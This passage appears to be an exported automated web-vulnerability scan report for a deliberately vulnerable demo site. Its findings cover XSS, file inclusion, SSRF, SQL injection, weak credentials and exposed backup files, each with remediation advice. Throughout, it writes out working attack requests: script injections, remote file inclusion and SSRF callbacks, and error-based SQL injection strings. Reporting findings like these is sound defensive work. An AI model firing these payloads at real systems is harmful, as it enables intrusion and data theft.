Details URL encoded POST input uemail was set to sample%40email.tst'"()&%<ScRiPt >prompt(915355)</ScRiPt> Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 239 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%2540ema il.tst'%22()%26%25<ScRiPt%20>prompt(915355)</ScRiPt>&upass=g00dPa%24%24w0rD&upass2=g00dP a%24%24w0rD&uphone=555-666-0606&urname=tgvffjmw&uuname=tgvffjmw /secured/newuser.php Details URL encoded POST input uphone was set to 555-666-0606'"()&%<ScRiPt >prompt(989159)</ScRiPt> websecurityscan.eu 20

Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email .tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606'%22()%26%25<ScRi Pt%20>prompt(989159)</ScRiPt>&urname=ixjtwixr&uuname=ixjtwixr /secured/newuser.php Details URL encoded POST input urname was set to ixjtwixr'"()&%<ScRiPt >prompt(993411)</ScRiPt> Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email .tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=ixjtwixr' %22()%26%25<ScRiPt%20>prompt(993411)</ScRiPt>&uuname=jnprxole /secured/newuser.php Details URL encoded POST input uuname was set to jnprxole'"()&%<ScRiPt >prompt(911833)</ScRiPt> Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email .tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=himfkqej& uuname=jnprxole'%22()%26%25<ScRiPt%20>prompt(911833)</ScRiPt>

websecurityscan.eu

21

File inclusion
Severity High Type Validation Reported by module Scripting (File_Inclusion.script) Description This script is possibly vulnerable to file inclusion attacks. It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function. Impact It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the web-server. Recommendation Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list. For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. It is recommended to disable this option from php.ini. References PHP - Using remote files OWASP PHP Top 5 Remote file inclusion Affected items /showimage.php Details URL encoded GET input file was set to http://testasp.vulnweb.com/t/fit.txt?%00.jpg Error message found: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8 Request headers GET /showimage.php?file=http://testasp.vulnweb.com/t/fit.txt%3f%2500.jpg HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /showimage.php Details URL encoded GET input file was set to http://testasp.vulnweb.com/t/fit.txt?%00.jpg Error message found: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8 Request headers GET /showimage.php?file=http://testasp.vulnweb.com/t/fit.txt%3f%2500.jpg&size=160 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

22

HTTP parameter pollution


Severity High Type Configuration Reported by module Scripting (HTTP_Parameter_Pollution.script) Description This script is possibly vulnerable to HTTP Parameter Pollution attacks. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either clientside or server-side attacks. Impact The impact depends on the affected web application. An attacker could - Override existing hardcoded HTTP parameters - Modify the application behaviors - Access and, potentially exploit, uncontrollable variables - Bypass input validation checkpoints and WAFs rules

Recommendation The application should properly sanitize user input (URL encode) to protect against this vulnerability. References HTTP Parameter Pollution Affected items /hpp/ Details URL encoded GET input pp was set to 12&n926891=v988769 Parameter precedence: last occurrence Affected link: params.php?p=valid&pp=12&n926891=v988769 Affected parameter: p=valid Request headers GET /hpp/?pp=12%26n926891%3dv988769 HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

23

PHP allow_url_fopen enabled


Severity High Type Configuration Reported by module Scripting (PHPInfo.script) Description The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering. allow_url_fopen is enabled by default. Impact Application dependant - possible remote file inclusion. Recommendation You can disable allow_url_fopen from php.ini or .htaccess. php.ini allow_url_fopen = 'off' .htaccess php_flag allow_url_fopen off

Affected items /secured/phpinfo.php Details This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.php allow_url_fopen: On Request headers GET /secured/phpinfo.php HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

24

Script source code disclosure


Severity High Type Validation Reported by module Scripting (Script_Source_Code_Disclosure.script) Description It is possible to read the source code of this script by using script filename as a parameter. It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function. Impact An attacker can gather sensitive information (database connection strings, application logic) by analysis the source code. This information can be used to launch further attacks. Recommendation Analiese the source code of this script and solve the problem. References Source Code Disclosure Can Be Exploited On Your Website Affected items /showimage.php Details URL encoded GET input file was set to showimage.php Source disclosure pattern found: <?php // header("Content-Length: 1" /*. filesize($name)*/); if( isset($_GET["file"]) && !isset($_GET["size"]) ){ // open the file in a binary mode header("Content-Type: image/jpeg"); $name = $_GET["file"]; $fp = fopen($name, 'rb'); // send the right headers header("Content-Type: image/jpeg"); // dump the picture and stop the script fpassthru($fp); exit; } elseif (isset($_GET["file"]) && isset($_GET["size"])){ header("Content-Type: image/jpeg"); $name = $_GET["file"]; $fp = fopen($name.'.tn', 'rb'); // send the right headers header("Content-Type: image/jpeg"); // dump the picture and stop the script fpassthru($fp); exit; } ?> Request headers GET /showimage.php?file=showimage.php HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* websecurityscan.eu 25

Server side request forgery


Severity High Type Configuration Reported by module Scripting (Server_Side_Request_Forgery.script) Description SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References for more information about this problem. Impact The impact varies according to the affected server interface. Recommendation Your script should properly sanitize user input. References SSRF VS. BUSINESS-CRITICAL APPLICATIONS Affected items /showimage.php Details URL encoded GET input file was set to http://hit88gOhDfx9x.bxss.me/ An HTTP request was initiated for the domain hit88gOhDfx9x.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery). HTTP request details: IP address: 176.28.50.165 User agent: Request headers GET /showimage.php?file=http://hit88gOhDfx9x.bxss.me/&size=160 HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /showimage.php Details URL encoded GET input file was set to http://hittpCy6EuxV7.bxss.me/ An HTTP request was initiated for the domain hittpCy6EuxV7.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery). HTTP request details: IP address: 176.28.50.165 User agent: Request headers GET /showimage.php?file=http://hittpCy6EuxV7.bxss.me/ HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

26

SQL injection
Severity High Type Validation Reported by module Scripting (Sql_Injection.script) Description This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. Impact An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. Recommendation Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability. References VIDEO: SQL Injection tutorial OWASP Injection Flaws How to check for SQL injection vulnerabilities SQL Injection Walkthrough OWASP PHP Top 5 Acunetix SQL Injection Attack Affected items /AJAX/infoartist.php Details URL encoded GET input id was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/AJAX/infoartist.php on line 7 Request headers GET /AJAX/infoartist.php?id=1'%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /AJAX/infocateg.php Details URL encoded GET input id was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/AJAX/infocateg.php on line 7 websecurityscan.eu

27

Request headers GET /AJAX/infocateg.php?id=1'%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /AJAX/infotitle.php Details URL encoded POST input id was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/AJAX/infotitle.php on line 7 Request headers POST /AJAX/infotitle.php HTTP/1.1 Content-Length: 8 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* id=1'%22 /artists.php Details URL encoded GET input artist was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62 Request headers GET /artists.php?artist=1'%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /product.php Details URL encoded GET input pic was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/product.php on line 70 Request headers GET /product.php?pic=1'%22 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /search.php Details URL encoded GET input test was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61 Request headers POST /search.php?test=1'%22 HTTP/1.1 Content-Length: 22 Content-Type: application/x-www-form-urlencoded websecurityscan.eu 28

Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* goButton=go&searchFor= /userinfo.php Details URL encoded POST input pass was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/userinfo.php on line 10 Request headers POST /userinfo.php HTTP/1.1 Content-Length: 25 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* pass=1'%22&uname=elvkswdd /userinfo.php Details URL encoded POST input uname was set to 1'" Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/userinfo.php on line 10 Request headers POST /userinfo.php HTTP/1.1 Content-Length: 33 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* pass=g00dPa%24%24w0rD&uname=1'%22

websecurityscan.eu

29

SQL injection (verified)


Severity High Type Validation Reported by module Scripting (Sql_Injection.script) Description This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. Impact An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. Recommendation Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability. References Acunetix SQL Injection Attack VIDEO: SQL Injection tutorial OWASP Injection Flaws How to check for SQL injection vulnerabilities SQL Injection Walkthrough OWASP PHP Top 5 Affected items /listproducts.php Details URL encoded GET input artist was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(66),CHAR(87),CHAR(102),CHAR(115),CHA R(68),CHAR(117),CHAR(116)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) Injected pattern found: 4CuKBWfsDut Request headers GET /listproducts.php?artist=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(conc at(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(75)%2cCHAR(66)%2cCHAR(87)%2cCHAR(102)%2cCHAR(1 15)%2cCHAR(68)%2cCHAR(117)%2cCHAR(116))%2cfloor(rand()*2))x%20from%20(select%201%20union %20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

30

/listproducts.php Details URL encoded GET input cat was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(90),CHAR(69),CHAR(108),CHAR(50),CHAR(101),CHA R(50),CHAR(57),CHAR(78)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) Injected pattern found: 4CuZEl2e29N Request headers GET /listproducts.php?cat=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat( CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(90)%2cCHAR(69)%2cCHAR(108)%2cCHAR(50)%2cCHAR(101) %2cCHAR(50)%2cCHAR(57)%2cCHAR(78))%2cfloor(rand()*2))x%20from%20(select%201%20union%20se lect%202)a%20group%20by%20x%20limit%201)) HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /secured/newuser.php Details URL encoded POST input uuname was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(74),CHAR(76),CHAR(53),CHAR(48),CHAR(111),CHAR(66),CHAR(69), CHAR(102)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' Injected pattern found: 4CuJL50oBEf Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 504 Content-Type: application/x-www-form-urlencoded Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* (line truncated) ...up=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email. tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=jojvplej&u uname='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR (67)%2cCHAR(117)%2cCHAR(74)%2cCHAR(76)%2cCHAR(53)%2cCHAR(48)%2cCHAR(111)%2cCHAR(66)%2cCH AR(69)%2cCHAR(102))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)* 2))x%20from%20information_schema.tables%20group%20by%20x)a)and'

websecurityscan.eu

31

Weak password
Severity High Type Informational Reported by module Scripting (Html_Authentication_Audit.script) Description Manual confirmation is required for this alert. This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes. Impact An attacker may access the contents of the password-protected page. Recommendation Enforce a strong password policy. Don't permit weak passwords or passwords based on dictionary words. References Authentication Hacking Attacks Wikipedia - Password strength Affected items /userinfo.php Details Username: test, Password: test Request headers POST /userinfo.php HTTP/1.1 Content-Length: 20 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* pass=test&uname=test

websecurityscan.eu

32

.htaccess file readable


Severity Medium Type Validation Reported by module Scripting (htaccess_File_Readable.script) Description This directory contains an .htaccess file that is readable. This may indicate a server misconfiguration. htaccess files are designed to be parsed by web server and should not be directly accessible. These files could contain sensitive information that could help an attacker to conduct further attacks. It's recommended to restrict access to this file. Impact Possible sensitive information disclosure. Recommendation Restrict access to the .htaccess file by adjusting the web server configuration. Affected items /Mod_Rewrite_Shop Details No details are available. Request headers GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

33

Application error message


Severity Medium Type Validation Reported by module Scripting (Error_Message.script) Description This page contains an error/warning message that may disclose sensitive information.The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages. Impact The error messages may disclose sensitive information. This information can be used to launch further attacks. Recommendation Review the source code for this script. References PHP Runtime Configuration Affected items /listproducts.php Details URL encoded GET input artist was set to Error message found: You have an error in your SQL syntax Request headers GET /listproducts.php?artist= HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details URL encoded GET input artist was set to 1 Error message found: Unknown column 'Array' in 'where clause' Request headers GET /listproducts.php?artist[$acunetix]=1 HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /listproducts.php Details URL encoded GET input cat was set to 1 Error message found: Unknown column 'Array' in 'where clause' Request headers GET /listproducts.php?cat[$acunetix]=1 HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* websecurityscan.eu 34

/listproducts.php Details URL encoded GET input cat was set to Error message found: You have an error in your SQL syntax Request headers GET /listproducts.php?cat= HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /secured/newuser.php Details URL encoded POST input uuname was set to '"\'\");|]*{%0d%0a<%00>%bf%27' Error message found: You have an error in your SQL syntax Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email .tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=moqpcgrb& uuname='"\'\");|]*{%0d%0a<%00>%bf%27' /secured/newuser.php Details URL encoded POST input uuname was set to '"() Error message found: You have an error in your SQL syntax Request headers POST /secured/newuser.php HTTP/1.1 Content-Length: 189 Content-Type: application/x-www-form-urlencoded Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email .tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=jvyykngv& uuname='%22() /showimage.php Details URL encoded GET input file was set to 1 Error message found: Warning: fopen(): Unable to access Array.tn in /hj/var/www/showimage.php on line 19 Warning: fopen(Array.tn): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19 Request headers GET /showimage.php?file[$acunetix]=1&size=160 HTTP/1.1 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* websecurityscan.eu 35

/showimage.php Details URL encoded GET input file was set to Error message found: Warning: fopen(): Unable to access .tn in /hj/var/www/showimage.php on line 19 Warning: fopen(.tn): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19 Request headers GET /showimage.php?file=&size=160 HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* /showimage.php Details URL encoded GET input file was set to Error message found: Warning: fopen(): Filename cannot be empty in /hj/var/www/showimage.php on line 7 Request headers GET /showimage.php?file= HTTP/1.1 Referer: http://testphp.vulnweb.com Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

36

Backup files
Severity Medium Type Validation Reported by module Scripting (Backup_File.script) Description A possible backup file was found on your web-server. These files are usually created by developers to backup their work. Impact Backup files can contain script sources, configuration files or other sensitive information that may help an malicious user to prepare more advanced attacks. Recommendation Remove the file(s) if they are not required on your website. As an additional step, it is recommended to implement a security policy within your organization to disallow creation of backup files in directories accessible from the web. References Protecting Confidential Documents at Your Site Testing for Old, Backup and Unreferenced Files (OWASP-CM-006) Security Tips for Server Configuration Affected items

websecurityscan.eu

37

/index.bak Details This file was found using the pattern ${fileName}.bak. Original filename: index.php Source code pattern found: <?PHP require_once("database_connect.php"); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of WASP Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> websecurityscan.eu 38

<ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wasp@acunetix.com">Contact Us</a> | &copy;2004 Acunetix Ltd </div> <br> </div> </body> <!-- InstanceEnd --></html> Request headers GET /index.bak HTTP/1.1 Range: bytes=0-99999 Host: testphp.vulnweb.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */*

websecurityscan.eu

39

/index.zip Details This file was found using the pattern ${fileName}.zip. Original filename: index.php Source code pattern found: <?PHP require_once("database_connect.php"); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of WASP Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div 